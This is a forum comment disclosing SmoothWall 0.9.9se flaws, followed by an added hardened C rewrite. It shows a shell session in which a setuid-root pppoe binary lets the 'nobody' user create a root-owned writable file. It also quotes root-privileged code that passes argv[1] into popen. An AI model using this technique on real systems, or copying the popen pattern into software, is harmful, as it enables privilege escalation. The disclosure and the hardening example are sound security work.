Comment Yet another smoothwall security hole (Score 5, Informative) 296
Just downloaded smoothwall 0.9.9se and had a search on google.
bash$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody),14(smoothwa)
bash$ ls -l /usr/sbin/pppoe
-rwsr-x--- 1 root nobody 23888 Aug 6 12:36 /usr/sbin/pppoe
bash$ /usr/sbin/pppoe -D /etc/test
bash$ ls -l /etc/test
-rw-rw-r-- 1 root nobody 367 Jan 10 03:11 /etc/test
Though it's not surprising it's full of holes with code that the smoothwall people write:
...
if (setgid(0)) { fprintf(stderr, "Couldn't set GID to 0\n"); return 0; }
if (setuid(0)) { fprintf(stderr, "Couldn't set UID to 0\n"); return 0; }
...
snprintf(command, STRING_SIZE - 1, "/var/patches/%s/setup", argv[1]);
if (!(p = popen(command, "r")))
return -1;
etc. etc.
It's full of setgid(0);setuid(0);system(command);
absolutely unbelievable.
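An added example, not part of the original comment and not SmoothWall's code: a hardened counterpart to the quoted `snprintf`/`popen` pattern, which validates `argv[1]` before it reaches a path and then runs the program with `execve` rather than through a shell. The function names, the character allow-list and `MAX_ID_LEN` are assumptions made for this sketch; only the `/var/patches/%s/setup` layout comes from the snippet above.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PATCH_ROOT "/var/patches"   /* path taken from the quoted snippet */
#define MAX_ID_LEN 64               /* assumed limit for this example */

/* Accept only short identifiers made of [A-Za-z0-9_-] plus inner dots.
 * Rejects '/', "..", spaces and every shell metacharacter. */
int patch_id_is_safe(const char *id)
{
    size_t len = id ? strlen(id) : 0;
    if (len == 0 || len > MAX_ID_LEN || id[0] == '.')
        return 0;
    return strspn(id, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                      "0123456789._-") == len && strstr(id, "..") == NULL;
}

/* Build "/var/patches/<id>/setup"; -1 on bad id or truncation. */
int build_setup_path(char *out, size_t outlen, const char *id)
{
    if (!patch_id_is_safe(id))
        return -1;
    int n = snprintf(out, outlen, "%s/%s/setup", PATCH_ROOT, id);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Run the setup program directly: no shell, empty environment.
 * Returns the child's exit status, or -1 on any failure. */
int run_setup(const char *id)
{
    char path[256];
    int status;
    if (build_setup_path(path, sizeof path, id) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { path, NULL };
        char *const envp[] = { NULL };
        execve(path, argv, envp);
        _exit(127);               /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Input validation only closes the shell-injection and path-traversal routes; the directories under `/var/patches` must also be writable by root alone, or the validated path can still point at a file the unprivileged user controls.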